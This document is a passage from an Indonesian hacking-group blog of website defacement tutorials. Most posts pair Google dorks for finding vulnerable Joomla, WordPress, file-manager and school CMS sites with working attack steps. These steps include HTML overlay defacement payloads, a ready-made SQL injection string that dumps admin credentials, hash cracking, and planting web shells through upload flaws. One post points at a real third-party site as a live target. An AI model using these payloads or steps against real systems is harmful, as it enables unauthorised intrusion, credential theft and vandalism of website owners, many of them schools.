Friday, September 16, 2016

Deface Com_Guestbook Arbitrary Code Injection


kali ini saya Yukinoshita 47 ingin sharing poc hasil riset nya sang master yaitu E7B_404 dia menggunakan script jahat saya buat bahan riset nya :v


oke kali ini deface web Joomla yang menggunakan component GuestBook

udah selesai kan coli nya :D oke langsung aja kita ke tahap selanjut nya :v



Dork nya : inurl:option=com_guestbook

Exploitation : situs.co.li/[path-CMS]/index.php?option=com_guestbook
                        situs.co.li/index.php?option=com_guestbook

selanjutnya kalian dorking dulu :v 

udah nemu ? oke pertama2

Klik Add Comment

isi kolom Your Name, Your Email, URL, Title sembarangan aja trus pada kolom komentar nya di isi script jahat + script depesan kalian

Script Jahat Saya [ Jauh Lebih Keren dari JS Overlay :p ]

<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center> 

Script Depesan Saya :

<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br>  

jadi nya 


<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center>
<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br> 

seperti gambar dibawah ini


Jika Sudah Oke Klik Save Comment seperti gambar di bawah ini :


Jika muncul seperti ini berarti berhasil cukk yeayyy :D 


hahaha gampang sekali kan :D

bagi pengguna joomla component guestbook ini segera update ke versi yang paling baru ya biar gak kena tempel :v



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Heruu Dot ID | And All Member of Garuda Security Hacker

Saturday, September 10, 2016

Tutorial SQLi Injection + Install XAMPP + Install Joomla [ SQLi Injection in Localhost ]


Oke Sesuai Judul Tanpa Basa Basi :)
Query Injection : Touch Me
Tutorial By : Budi Andriyoga
Re-Tutorial : Sector.V2

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P | Budi Andriyoga

Friday, September 9, 2016

Release IMAGE PRIVACY TOOLS Ver. Garuda Security Hacker


Hallo Gays Maaf Blog GSH Jarang Update ..
Oke untung saya ada waktu luang untuk Sharing Software IMAGE PRIVACY TOOLS

Preface :
dikarenakan sekarang makin banyaknya pencurian data utamanya foto foto pribadi oleh para hacker, dengan menggunakan methode crypto locker dan meminta tebusan atas foto/data privacy.
tools ini bisa mengenkripsi file gambar / foto ke dalam extensi .syn
setelah di enkripsi dimana hanya dengan program inilah foto/data tersebut dapat di buka/dilihat.

Itu adalah keterangan Software Tersebut.

Link Download
MediaFire [Status] OK

Link Error ? Bisa Kontak Admin / Sector.V2 ( Sudah ada post nya di blog ini )
Tidak Lupa Terimakasih ke Grup 1337CyberIndo
Remake : Fear
Author  : Budi Andriyoga
ASK :
Bang Ada Source Code nya gak ? 
Tenang Ada kok ..
Cek My Github : EleynSect

Thanks.
Salam Tampan & Keep Stay Cooly


Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P | Budi Andriyoga + 1337CyberIndo

Friday, September 2, 2016

Deface Robot Stats HTML Injection


Baiklah para penebas website orang dan para pencari poc deface kali ini saya ingin menjelaskan tentang salah satu teknik deface yaitu HTML Injection untuk detail nya :

Platform CMS : RobotStats 1.0
Vulnerability : HTML Injection
Tools : Amplast Buat Coli
Syarat : Sebelum Mulai silahkan coli dulu pake amplast wkwkwkwkwk
Dork : inurl:"/robotstats/admin/robots.php" dan inurl:"admin/robots.php" selanjut nya lu gunakan imajinasi cabul kalian buat ngembangin dorknya

ok langsung saja

pertama dorking dulu sambil coli pake amplas :v dan akhir nya nemu juga ne live target nya http://alpesoiseaux.free.fr

oke pertama buka 
http://situs.co.li/path-cms/admin/robots.php
contoh : http://alpesoiseaux.free.fr/robotstats/admin/robots.php

kalo vuln atau yang CMS RobotStats akan terlihat seperti gambar dibawah ini



selanjutnya pilih Modifier maka akan muncul seperti gambar dibawah ini.



kemudian pada bagian kolom yang paling atas isi dengan script HTML Injection nya 


<font color=red size=8><body bgcolor=black>KALIMAT LU<img src=URL GAMBAR LU />

contoh :

<font color=red size=8><body bgcolor=black>Injected by Yukinoshita 47<img src=http://data.whicdn.com/images/99814598/large.jpg />

kamudian letakkan script ini di form/kolom yang paling atas yang lainnya biarin aja default kemudian klik ok sesuai dengan gambar dibawah ini



dan jika berhasil maka akan muncul seperti gambar  dibawah ini

kemudian klik Retour à l'administration des robots. atau akses aja 

situs.co.li/path-cms/admin/robots.php

contoh : http://alpesoiseaux.free.fr/robotstats/admin/robots.php

dan hasil deface nya kurang lebih seperti gambar dibawah ini :v

btw poc ini bisa masuk mirror loh :v 

Deface Metode File Uploader Japan

 
Method Deface ini adalah hasil riset nya E7B_404 silahkan simak saja video berikut ini

Monday, August 15, 2016

Deface Dengan phUploader Vulnerbility File Upload

Deface Dengan phUploader Vulnerbility File Upload

Garuda Security Hacker
Masih Misteri :v

Lagi Lagi, E7B_404 iseng dorking terus di share di grup :v setelah ane sek ternyata POC nya masih ok kok, terus ane coba notif di defacer.id, dan ternyata sukses.. tanpa pikir panjang ane langsung share ini Tutorial "Deface Dengan phUploader Vulnerbility File Upload". memang cuma upload file .txt sih tapi lumayan bisa masuk ke beberapa mirror. simak aja dah tutorialnya..

Bahan-Bahan :

Dork Google :
# intitle:Powered by phUploader
Kembangkan lagi ya mblo :v

File Text kalian..
Kalo pengen variasi pakai text to ASCII aja cari di gugel.

Step by Step :

1. Dorking lah di gugel seperti biasa.

2. Pilih target yang soleha, rajin sholat, pandai masak :v

3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya

Deface Dengan phUploader Vulnerbility File Upload
Maklumin aja bahasanya :v
4. klik browse lalu pilih file text kalian.

5. lalu kalian klik tombol upload, itu kan ada 2 tombol yang kiri biasanya tombol upload

Deface Dengan phUploader Vulnerbility File Upload

 6. Setelah sukses akan muncul url bokep kalian..

Deface Dengan phUploader Vulnerbility File Upload

 7. Aksesnya tinggal klik aja Url nya, klo ga bisa di klik, ya Use Your Brain

8. Selesai,, terserah mau di apain setelah itu :v

Thanks To : E7B_404 (Ketua Team Riset)

Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P |

Use Your Brain :)

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Friday, August 12, 2016

Cara Akses Shell/Script di CMS Open Journal System

Cara Akses Shell/Script di CMS Open Journal System


Cara Akses Shell/Script di CMS Open Journal System

Banyak amat yang nanya cara akses shell di OJS gmna ?? plis bantuin dong -_- Cape Dehh..
Mainkan Logika Kalian Bung !! Jangan terlalu manja,, gmna mau berhasil kalo manja gitu ??
Kurang baik apa gw, sampe buatin tutorial sedetail ini.. sbner nya gw ada rasa males tersendiri.. tapi dari pada gw di todong terus dengan pertanyaan "Cara Akses Shell Di OJS??" mending gw buat beginian, tapi setelah ini gw kaga bakal ngejawab pertanyaan tentang ini. CAMKAN !!

Step by Step :

1. Baca Tutorial ini dlu buat yang belum ngarti cara deface OJS : Deface Dengan Open Journals System Arbitrary File Upload

2. Setelah kalian pilih-pilih target.. kalian jangan langsung register + tanam shell... Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau engga..

3. Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.tai/files

Cara Akses Shell/Script di CMS Open Journal System
Bisa Vuln Bisa Tidak.

Cara Akses Shell/Script di CMS Open Journal System
Not Vuln

Cara Akses Shell/Script di CMS Open Journal System
This Vuln

4. Kalo udah vuln kaya gambar ke 3 (kurang lebihnya), baru kalian mulai register... kalo kaga tau cara register dan tanam shellnya baca di artikel : Deface Dengan Open Journals System Arbitrary File Upload

5. Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (angka-angka) pas bagian situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.

6. Selesai !!

Warning !!
Setelah tutorial ini gw kaga bakal jawab pertanyaan apapun tentang Deface Open Journal System, terserah kalian mau bilang gw sombong,, gw cape klo harus jelasin berkali kali. Hargai Orang !!

Regard : _Tuan2Fay_


Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disini

Wednesday, August 10, 2016

Deface Dengan Responsive FileManager

 Deface Dengan Responsive FileManager

 

Deface Dengan Responsive FileManager
Masih Misteri :v

Biasa,, lagi iseng iseng dorking nemu file terus ane klik,, ternyata semacam file manager lebih tepatnya : "Responsive FileManager" file manager nya juga udah kaga asing bagi ane.. ane pernah liat saat exploiting Popoji CMS (web sekolah sendiri, sebelum exploit itu tenar dimana2). eh ternyata ane keduluan sama E7B_404 , yang lebih dlu tau exploit ini, terus ane kembangin lagi dorknya aja... ok deh simak aja Tutorial nya.. "Deface Dengan Responsive FileManager"

Bahan-Bahan :

Dork :
  1. inurl:/filemanager/ intext:"dialog.php"
  2. inurl:/js/filemanager/ intext:"dialog.php"
  3. inurl:/assets/filemanager/ intext:"dialog.php"

Exploit (File yang terinfeksi/bisa di exploit) :
dialog.php
example : www.targetsuka.co.li/filemanager/dialog.php

Script Pepes
klo belum punya bikin atau colong punya orang

Step by Step :

1. Seperti biasa,, dorking adalah hal wajib.. dorking di gugel pake dork di atas (saya pakai dork no.1)

2. Pilih target nyaa..

Deface Dengan Responsive FileManager
Klik dialog.php

3. Setelah klik dialog.php kalian akan beralih ke Responsive FileManager

4. Cari aja tombol upload di pojok atas kiri (biasanya di situ)

Deface Dengan Responsive FileManager
Klik aja.

5. Setelah itu kalian klik lalu pilih script deface kalian

6. Jika sukses hasilnya seperti ini..

Deface Dengan Responsive FileManager
Ada tanda ceklis berwarna hijau
7. Untuk aksesnya kalian.. kembali dlu ke awal Responsive FileManager nya (klik tombol hitam di atas) lupa gw tandain :v

8. Klik kanan pada file yang telah kalian upload tadi,, lalu pilih Show URL

Deface Dengan Responsive FileManager

9. Kalian Copy url nya terus paste di address bar browser kamu.. dan jrengg-jrengg..

10. Nitip nick boleh kali ?? _Tuan2Fay_

11. Nitip nama Garuda Security Hacker boleh kali ??


Note : Copas Boleh. Izin dlu lewat komentar di artikel ini dan Sertakan Link Sumber (Link Aktif)
Hargailah karya orang lain !!

Bila Ada Pertanyaan silahkan berkomentar !!

Grup FB (Forum Diskusi) : Garuda Security Hacker - Grup

Greets :
| _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lynoc | E7B_404 | ./Zero*Angel | ML7C | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | D34D_SL33P |

Learning And Actions !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Monday, August 8, 2016

Deface Ajax File Manager [Fresh Dork]

Deface Ajax FileManager [Fresh Dork]

Deface Ajax File Manager [Fresh Dork]

Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ?
Notif-Notif dan Notif yang mereka kejar padahal sih santai aja..

Deface Ajax File Manager [Fresh Dork]
E7B_404

Bahan-Bahan :

# Dork :
  1. intitle:"Ajax File Manager" site:au
  2. inurl:/ajaxfilemanager.php intext:"/Root Folder"
  3. inurl:/ajaxfilemanager.php intext:"upload"
  4. inurl:/ajaxfilemanager.php .ac.
  5. intitle:"index of" intext:"ajaxfilemanager.php"
Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !)
Note : site: boleh di ganti dengan domain atau di hapus

# File txt yang mau di upload
Kalo mau keren pake ASCII aja : klik disini

Step by Step :

1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel

2. Setelah sekian lama milih target, gw dapet 1 yang perawan..

Deface Ajax File Manager [Fresh Dork]
Penampakan saat pertama kali buka target nya..

3.  Setelah gw klik tuh file ajaxfilemanager.php, gw langsung berubah jadi power ranger pink !!!!

4. Setelah masuk ke Ajax File Manager nya, kalian klik tombol upload di pojok kanan atas..

5. Pilih file .txt kalian...

Deface Ajax File Manager [Fresh Dork]

6. Setelah berhasil upload akan mucul nama file kalian..

7. Akses file nya gmna ?? ini akan sedikit memakan emosi, energi jiwa dan raga, !! persiapkan mental kalian. :v

8. Arahkan Cursor kalian ke gambar icon file yang telah kalian upload.. (liat gambar)

Deface Ajax File Manager [Fresh Dork]
Di pojok kiri bawah ada link file nya

9. Di Pojok kiri bawah mucul lah link file kalian,, tinggal kalian pikir bagaimana akses nya :v
mau di ketik manual boleh.. mau di diemin juga boleh :v

Ok !! Sekian dlu Coeg.. nanti gw update lagi.. karena gw juga banyak urusan di sekolah..


Big Thanks to : E7B_404 - Garuda Security Hacker

Quote From E7B_404 : "Tak Ada Poc Basi Yang Ada Otak Anda Basi"


Laporan Link Rusak, Mati, atau Error : Klik Di Sini

Punya Kritik dan Saran ??? Atau Keluhan ?? Hubungi Kami :) 

Saturday, August 6, 2016

[Download] Modul Debian 6 (Squeeze) Server Configuration

Modul Debian 6 (Squeeze) Server Configuration

Modul Debian 6 (Squeeze) Server Configuration

Karena ane sibuk tugas sekolah ane juga kaga tau harus update apa, mumet juga dah kelas 11 tugas makin numpuk. ane iseng copy file module di PC Lab sekolah ane, ane juga lagi belajar "Debian 6 Server" buset tuh CLI yang memusingkan kaga ada gambar ini itu, apa lagi gambar hentai -_-.
Buat kalian yang anak TKJ ane kasih modul pembelajaran soal "Debian 6 Server (Configuration)"
format file nya .docx bukan pdf..

Daftar isi :

  • DNS Server Configuration
  • Web Server
  • Mail Server Configuration
  • FTP Configuration
  • DLLC (dan lain lain coeg)
Link Download :
Modul Debian 6 (Squeeze) Server Configuration

Wednesday, August 3, 2016

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Deface WordPress Theme Exploit (Vulnerbility CSRF)

Lagi-lagi wordpress, tema-tema wordpress memang selalu mewarnai khasanah perexploitan (si anjirr), entah dari tahun berapa itu tema nya.. bug nya selalu belum di tutup -_-. Waspadalah para penguna WordPress. ceritanya gini : ane lagi jalan-jalan di gugel ngetik keyword dengan tutorial yang "Deface SQLi Schoolhos CMS" ketemu lah beberapa tema wordpress yang vuln CSRF karena tema nya kaga cuma satu, ane juga bingung namain judul artikel ini, ya sudahlah alakadar nya aja. simak deh tutorial "Deface WordPress Theme Exploit (Vulnerbility CSRF)". cek the crots :v

Bahan-Bahan :

1. Dork (ada lebih dari satu :v)
# inurl:/wp-content/themes/shepard/
# inurl:/wp-content/themes/money/
# inurl:/wp-content/themes/clockstone/
# inurl:/wp-content/themes/ambleside/
# inurl:/wp-content/themes/pacifico/

2. Exploit (lebih dari 1 juga -_-)
# /theme/functions/upload-bg.php
# /theme/functions/upload.php
# /theme/functions/uploadbg.php

3. CSRF Online : Touch She Oppai :v (Postname nya : uploadfile)

Step by Step :

1. Dorking lah kalian menggunakan dorking gambar (gugel gambar tau kan?)

2. Pilih Gambar nya deh... tunggu loading selesai setelah itu klik kanan -> Copy Image Location -> New Tab -> paste url dan go. (kalo di chrome bisa langsung open image in new tab klo kaga salah)

3. Masukan exploit di url si korban contoh : http://targetopgaza.co.li/wp-content/themes/namatemadiatas/theme/functions/upload-bg.php (coba aja exploit yang di atas satu-satu)

4. Vulnerbility ?? ada tulisan "_Tuan2Fay_ ganteng :v" Vuln : error

5. Buka CSRF Online nya.. masukan url target ke liang kubur, postname nya uploadfile, klik next upload file kalian..

6. Jika sukses akan ada nama random shell kalian. Look the Picture Hentai :v

Deface WordPress Theme Exploit (Vulnerbility CSRF)
Nanem Shell Backdoor di hati cewe nya kapan ? :'(

7. Akses Shell ?? Tanyakan pada oppai yang bergetar :* 

8. Akses : http://fakeangkot.taxi/wp-content/themes/namatemayangdiapakai/theme/functions/namarandomshellkalian.php

Note : Copas ? boleh tapi izin di komentar dan sertakan sumber link postingan ini !! kemaren nemu lagi 2 blog yang copas artikel ketikan ane tanpa sertakan sumber apa lagi izin -_- (Persetan Haters Transparan Seperti Kalian)

Membacalah !! Cermatilah !! Pahamilah !! Praktekan !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disin

Sunday, July 31, 2016

Deface SQLi Schoolhos CMS

Deface SQLi Schoolhos CMS

 

Deface SQLi Schoolhos CMS

Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"


Bahan-bahan :

1. Dork :
# inurl:"/?p=info" site:id
# inurl:"/?p=detberita"
# inurl:"/?p=guru" site:id
kembangkan lagi dengan otak hentai kalian :v

2. SQL Injection (Exploit SQL)
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 Hash Decrypter : https://hashkiller.co.uk/

Step by Step :

1. Dorking di gugel (jangan dorking gambar coeg)

2. Pilih target kamu

3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Deface SQLi Schoolhos CMS

4. Kalo vuln akan muncul username dan password nya.

Deface SQLi Schoolhos CMS

Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.

5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.

6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/

7. Masukan username dan password yang kamu dapat tadi..

8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.

9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg

10. Setelah itu pilih shell kamu lalu gunakan tamper data..

11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)

Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.

Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.
Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.

Thanks to : Febru4ry - GooBlog

Notif Banyak Kaga Di Bayar, Ranking Naik Kaga Otomatis Master !!

Laporan Link Rusak  : Klik Disini

Daftar Tutorial Deface : Klik Disi